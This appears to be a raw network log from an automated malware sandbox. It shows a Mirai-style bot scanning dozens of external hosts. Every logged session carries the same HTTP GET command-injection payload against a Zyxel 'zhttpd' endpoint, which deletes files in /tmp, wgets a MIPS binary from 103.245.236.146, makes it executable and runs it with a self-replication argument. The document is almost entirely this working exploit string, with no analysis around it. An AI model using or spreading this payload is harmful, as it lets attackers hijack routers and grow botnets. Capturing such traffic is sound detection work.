                                                        Jan 28, 2024 10:12:43.217634916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1938192.168.2.144992485.175.191.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217654943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1939192.168.2.14494184.241.20.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217694044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1940192.168.2.1443006186.18.183.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217721939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1941192.168.2.1447898192.26.26.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217756033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1942192.168.2.143831650.26.10.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217797995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1943192.168.2.1450158155.200.254.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217840910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1944192.168.2.1438984150.228.239.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217910051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1945192.168.2.144639212.249.135.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217911005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1946192.168.2.1454664194.104.87.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217916012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1947192.168.2.1442726158.93.254.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217941999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1948192.168.2.144746083.230.61.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.217986107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1949192.168.2.1439442169.215.241.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218017101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1950192.168.2.1444286177.211.94.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218038082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1951192.168.2.1457132180.97.52.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218077898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1952192.168.2.144556044.119.174.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218128920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1953192.168.2.1437662182.18.173.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218162060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1954192.168.2.145207292.223.55.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218178988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1955192.168.2.1452688142.49.103.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218221903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1956192.168.2.144812699.5.213.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218254089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1957192.168.2.144437469.40.45.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218302965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1958192.168.2.14336428.142.46.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218463898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1959192.168.2.1452394124.108.39.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218488932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1960192.168.2.1444608134.173.95.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218516111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1961192.168.2.145391659.189.51.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218575954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1962192.168.2.1447246125.125.99.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218611002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1963192.168.2.1458902189.236.201.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218638897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1964192.168.2.1447520193.245.141.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218677998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1965192.168.2.1459892216.55.235.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218734026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1966192.168.2.1440740101.26.187.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218779087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1967192.168.2.143830046.164.84.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218807936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1968192.168.2.143385625.168.252.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218839884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1969192.168.2.145473823.169.133.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218866110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1970192.168.2.1437252208.252.143.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218924046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1971192.168.2.145728882.183.112.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.218957901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1972192.168.2.143294835.59.7.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219000101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1973192.168.2.1447514172.205.148.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219052076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1974192.168.2.145197460.93.165.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219069958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1975192.168.2.1456996116.196.19.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219103098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1976192.168.2.1446864162.223.13.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219161987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1977192.168.2.1441744163.24.56.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219199896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1978192.168.2.1449086136.69.255.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219250917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1979192.168.2.1452052138.116.115.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219276905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1980192.168.2.1435068179.218.99.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219310999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1981192.168.2.14594181.96.103.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219352007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1982192.168.2.143915449.213.16.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219388962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1983192.168.2.1444368166.143.122.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219424009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1984192.168.2.1433394222.147.74.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219506979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1985192.168.2.1442838178.10.193.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219533920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1986192.168.2.144398684.12.8.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219549894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1987192.168.2.1439224145.238.39.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219578028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1988192.168.2.144719042.84.188.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219655037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1989192.168.2.1454500201.70.99.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219674110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1990192.168.2.1456964150.5.100.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219713926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1991192.168.2.1439824203.93.249.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219748020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1992192.168.2.1446520179.20.230.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219796896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1993192.168.2.1444426120.78.193.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219820976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1994192.168.2.1434852166.225.36.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219918013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1995192.168.2.1435100172.69.218.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219940901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1996192.168.2.1460872217.138.189.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.219993114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1997192.168.2.1439330114.31.0.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220029116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1998192.168.2.1440216108.143.179.220443
                                                        TimestampBytes transferredDirectionData
